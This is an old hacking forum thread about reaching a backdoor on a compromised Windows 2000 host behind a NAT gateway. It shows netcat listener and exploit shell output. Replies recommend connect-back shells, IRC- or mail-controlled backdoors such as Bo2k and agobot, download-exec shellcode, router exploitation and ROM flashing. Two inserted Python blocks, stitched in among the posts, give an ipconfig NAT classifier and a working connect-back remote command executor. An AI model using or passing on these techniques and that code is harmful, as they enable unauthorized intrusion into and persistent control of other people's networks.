Full Version: Bypassing The Gateway
Partizaan
Case: connect-back

QUOTE
>nc.exe -vv -L -p 141
listening on [any] 141 ...
xxx.145.18.36: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xxx.201.161.234] from (UNKNOWN) [xxx.145.18.36] 2851: NO_DATA

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.16
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        IP Address. . . . . . . . . . . . : 192.168.10.11
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.10

C:\WINNT\system32>



Case: bind shell

QUOTE
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
[*] --------------------------------------------------------------------

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.64.17.49
        Subnet Mask . . . . . . . . . . . : 255.255.248.0
        Default Gateway . . . . . . . . . : 10.64.16.1

C:\WINNT\system32>


When you look at the IP addresses you see that the shell connects to the net through a gateway. You see only
INTERNAL IP addresses, which means the node is not physically connected to the Internet.

So now my question: if you have a backdoor running on the remote box, how can you connect to it? (When you don't have access to the gateway.) Fport is no use.
Anybody want to share the solution?

Thanks

(I already have another topic running on it, but I opened a second one because I didn't explain well what I wanted to ask.)
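The inference made above (only RFC 1918 addresses and a private default gateway, therefore the box sits behind a NAT gateway and a bind shell will not be reachable from outside) can be automated. The following is an added example, not code from the thread: it parses the two ipconfig dumps quoted in the post and a third, constructed dump for a directly connected host, and reports whether inbound connections would have to be forwarded by a gateway. The label names, the `assess` function and the constructed direct-connection dump are assumptions made for this example.

```python
"""Classify the addresses in a Windows ipconfig dump to decide whether the
host is behind a NAT gateway (only private / non-routable addresses) or
directly on the Internet.  Added example; not part of the original thread."""
import ipaddress
import re

# Sample input 1: the ipconfig output from the connect-back case in the post.
CONNECTBACK_DUMP = """
Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.16
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        IP Address. . . . . . . . . . . . : 192.168.10.11
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.10
"""

# Sample input 2: the ipconfig output from the bind-shell case in the post.
BINDSHELL_DUMP = """
Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.64.17.49
        Subnet Mask . . . . . . . . . . . : 255.255.248.0
        Default Gateway . . . . . . . . . : 10.64.16.1
"""

# Sample input 3: CONSTRUCTED for this example, a host with a public address
# on its interface (8.8.8.8 is used only because it is a well-known global
# address; the dump itself is made up).
DIRECT_DUMP = """
Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 8.8.8.8
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 8.8.8.1
"""

# Matches "IP Address. . . . : x.x.x.x" and "Default Gateway . . : x.x.x.x";
# the dotted leader between label and colon is swallowed by "[ .]*".
_ADDR_RE = re.compile(
    r"^[ \t]*(IP Address|Default Gateway)[ .]*:[ \t]*(\S+)[ \t]*$", re.MULTILINE
)


def parse_ipconfig(text):
    """Return (interface_addresses, gateways) as lists of ipaddress objects."""
    addrs, gws = [], []
    for label, value in _ADDR_RE.findall(text):
        try:
            ip = ipaddress.ip_address(value)
        except ValueError:
            continue  # e.g. a bare label line with no address after the colon
        (gws if label == "Default Gateway" else addrs).append(ip)
    return addrs, gws


def assess(text):
    """Summarise an ipconfig dump.  `behind_gateway` is True when every
    interface address is private (RFC 1918, loopback, link-local ...), i.e.
    the host only reaches the Internet via NAT and a bind shell is not
    reachable unless the gateway forwards the port; a connect-back shell is
    the practical choice in that case."""
    addrs, gws = parse_ipconfig(text)
    if not addrs:
        raise ValueError("no IP addresses found in ipconfig output")
    return {
        "addresses": [str(a) for a in addrs],
        "gateways": [str(g) for g in gws],
        "behind_gateway": all(a.is_private for a in addrs),
    }


if __name__ == "__main__":
    for name, dump in [("connect-back", CONNECTBACK_DUMP),
                       ("bind shell", BINDSHELL_DUMP),
                       ("constructed direct", DIRECT_DUMP)]:
        print(name, assess(dump))
```

`is_private` covers the RFC 1918 blocks the thread is concerned with, plus loopback and link-local; a multi-homed adapter (two addresses on one interface, as in the first dump) is handled because every address must be private before the host is reported as behind a gateway.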
AgentOrange
If you can't gain access to the router, I would RTFM. Sometimes, by default, some incoming connections are multicast to all computers on the network: Battle.net, Xbox Live, AIM, to name a few common ones. Other than that you could try using download-exec shellcode or an in-line egg, depending on what you are doing. One of my buddies made some win32 shellcode, written in C, to connect to the router and set itself as DMZ host. He used the GDI+ exploit because it had 2k of elbow room; the downside is you have to know what router they have. I suggest using a backdoor that connects to a chat network. There are a large number of backdoors like this; I suggest Bo2k. It's open source, and many of the agobot variants have backdoors in them.

peace
hodexut
Hi, I was looking at fpipe.exe. Would this possibly help in this kind of situation? Can anyone elaborate on their experiences with fpipe?
Thanks
hodexut
Pro21
You have three solutions, depending on the configuration of the gateway.

First case: the gateway redirects all traffic to the internal computer, and that's great for you.

Second case: you got the shell thanks to a hacked routed service, and to control all traffic you have to hack the gateway to set up the traffic, but it's not easy to do.

The last, as AgentOrange said: you can install an IRC bot that allows you to execute commands from IRC.

Good luck
Partizaan
OK, thanks guys!

Your replies confirmed that my view on the problem was correct.

Good feedback.
buzzons
Find out what router they use and just try the basic stuff on it; if it's a Cisco one, they are vulnerable to a few things, so try that.

Or make it connect back to you using a connect-back shell, so that it bypasses the gateway and NAT that way.

Buz
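The connect-back approach recommended above, shown as an added example rather than code from the thread: the listener plays the part of `nc -L -p <port>` on the outside, the other end (the box behind the gateway) opens the TCP connection outward and then serves commands over it, so the NAT only ever sees an outbound connection. It runs over loopback so it can be exercised offline; the `<<EOF>>` end-of-reply marker and the use of `python -c` as a stand-in for `cmd.exe` are assumptions of this example, as are all function names.

```python
"""Connect-back (reverse) session over loopback.  Added example; not code
from the original thread.  The inside host initiates the TCP connection,
which is why it works through a NAT gateway that only allows outbound
traffic, where a bind shell would wait for an inbound connection that the
gateway never forwards."""
import socket
import subprocess
import sys
import threading

EOF_MARK = b"<<EOF>>\n"  # assumed delimiter separating one reply from the next


def start_listener(host="127.0.0.1", port=0):
    """Outside end, equivalent of `nc -vv -L -p <port>`: bind, listen and
    return (socket, port).  port=0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(10)  # fail instead of hanging if nothing connects back
    return srv, srv.getsockname()[1]


def run_command(line):
    """Execute one command line and return its combined output.  Uses
    `python -c` so the example is portable; a real connect-back hands the
    line to cmd.exe or /bin/sh instead."""
    r = subprocess.run([sys.executable, "-c", line], capture_output=True, timeout=10)
    return r.stdout + r.stderr


def connect_back(host, port, executor=run_command):
    """Inside end: open the connection OUTWARD, then serve one command per
    line until the outside end closes the socket."""
    with socket.create_connection((host, port), timeout=10) as s, s.makefile("rb") as f:
        for line in f:
            s.sendall(executor(line.decode().strip()) + b"\n" + EOF_MARK)


def session_over_loopback(commands):
    """Drive a complete exchange: start the listener, let the inside end
    connect back in a thread, send each command and collect the replies."""
    srv, port = start_listener()
    t = threading.Thread(target=connect_back, args=("127.0.0.1", port))
    t.start()
    conn, _peer = srv.accept()
    conn.settimeout(30)
    replies = []
    with conn, conn.makefile("rb") as f:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            chunks = []
            for line in f:
                if line == EOF_MARK:
                    break
                chunks.append(line)
            replies.append(b"".join(chunks).decode().strip())
    srv.close()
    t.join()
    return replies


if __name__ == "__main__":
    print(session_over_loopback(["print(2 + 2)", "import os; print(os.getcwd())"]))
```

Both sockets are wrapped in `makefile` so the end of the conversation is signalled by closing the outside socket, which ends the inside loop; `SO_REUSEADDR` and an ephemeral port keep the example from colliding with a previous run.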
xes
Just try hacking the main computer that can access the gateway, depending on what kind of gateway it is.
If it's a Linux gateway, look at some port scans and banner grabs with netcat,
then access the router via the main PC. To do this, it's always a low number on the network (always static), so just try some ping sweeps of the network, see what PCs are on, which PCs are sending back low packets and fast packets; try to find the gateway's access PC by a 2000 - 3000 ms ping, it's always the one that has a lot of bandwidth going to it. Access that, then telnet to the gateway and buffer the password by finding a way to overflow it; just try random bytes from 1, 4, 8, 16 and so on... use a rhyme like a - aaaa - aaaabbbb - aaaabbbbccccdddd and so on. I'm sure you know the next numbers; if not, you shouldn't be on a PC.

Anyway, good luck.

P.S. I know this wouldn't have helped you, but this is a way of finding access if the gateway denies access from inside and outside network IPs that can access telnet or FTP and so on. Use TFTP to upload a flash bug and flash their ROM; you will cripple their network (don't do it, for God's sake).
LittleHacker
Well, there is another way, close to Pro21's 3rd solution:
you can install a backdoor and command it via mail!
You can bypass almost anything with such a program, as I do.
SyS49152
Don't forget that even if you can't access the router from outside by telnet and so on, you can gain a lot of info on it by SNMP, usually even from outside.
Partizaan
Well, indeed, everything I do from the shell works fine. Like outbound is no problem.
But inbound is *****ed up. A DOS mailer works fine indeed.

Thanks all for the feedback.
